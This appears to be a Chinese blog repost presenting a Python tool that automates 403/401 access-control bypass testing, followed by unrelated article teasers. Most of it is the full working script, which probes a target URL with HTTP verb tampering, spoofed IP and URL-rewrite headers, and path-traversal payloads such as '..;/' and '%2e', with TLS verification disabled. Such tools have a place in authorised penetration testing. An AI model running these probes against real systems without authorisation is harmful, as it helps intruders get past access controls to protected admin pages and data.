news 2026/1/28 5:48:25

一款自动化的403/401绕过测试工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
一款自动化的403/401绕过测试工具

工具介绍

一款自动化的403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等多种实战技巧。

工具使用

python run.py -u http://xx.com

run.py

import requests import argparse import urllib3 from urllib.parse import urlparse # 忽略 SSL 警告 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class BypassScanner: def __init__(self, target_url): self.target = target_url.rstrip('/') self.path = urlparse(target_url).path self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AF-Service-Scanner/1.0" } def scan(self): print(f"[*] Starting Bypass Scan for: {self.target}\n") # 1. 谓词篡改 (Verb Tampering) methods = ["GET", "POST", "HEAD", "PUT", "TRACE", "OPTIONS"] for m in methods: self._request(m, self.target, title=f"Method: {m}") # 2. Header 注入 bypass_headers = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Original-URL": self.path}, {"X-Rewrite-URL": self.path}, {"X-Remote-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"} ] for h in bypass_headers: self._request("GET", self.target, headers=h, title=f"Header: {list(h.keys())[0]}") # 3. 路径变形 (Path Fuzzing) # 包含你提到的 ..;/ 和 ../ path_payloads = [ f"{self.target}/", f"{self.target}/.", f"{self.target}..;/", f"{self.target}/..;/", f"{self.target}/%2e/", f"{self.target}//", f"{self.target}.json" ] for p in path_payloads: self._request("GET", p, title=f"Path: {p.replace(self.target, '')}") def _request(self, method, url, headers=None, title=""): test_headers = self.headers.copy() if headers: test_headers.update(headers) try: resp = requests.request(method, url, headers=test_headers, verify=False, timeout=5, allow_redirects=False) color = "\033[92m" if resp.status_code == 200 else "\033[90m" print(f"{color}[{resp.status_code}] {title} \033[0m") except Exception as e: print(f"[!] Error on {title}: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="403/401 Bypass Automation Tool") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://example.com/admin)") args = parser.parse_args() scanner = BypassScanner(args.url) scanner.scan()

工具下载

https://github.com/Adonis-363/403-
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/21 21:08:33

2026本科必备9个降AI率工具测评榜单

2026本科必备9个降AI率工具测评榜单 降AI率工具测评:为何你需要一份专业榜单? 在2026年的学术环境中,论文的AI率检测已经成为毕业和科研的关键门槛。许多学生在提交前才发现自己的论文AI率超标,甚至被直接打回修改,严重…

作者头像 李华
网站建设 2026/1/27 5:13:38

调色板示例颜色数据获取-基于 Flutter × OpenHarmony

文章目录调色板示例颜色数据获取-基于 Flutter OpenHarmony前言背景Flutter Harmony OpenHarmony 跨端开发介绍开发核心代码代码解析心得总结调色板示例颜色数据获取-基于 Flutter OpenHarmony 前言 在移动端开发中,颜色调色板是 UI 设计和视觉一致性的核心元素…

作者头像 李华
网站建设 2026/1/27 3:20:49

Python中的异常处理

异常 """异常(Exception):1.什么是异常?python运行时,发生的错误,而导致程序最终无法执行,异常!思考:有没有出现错误?编译过程中的错误,红色波浪线运行过程中的错误&…

作者头像 李华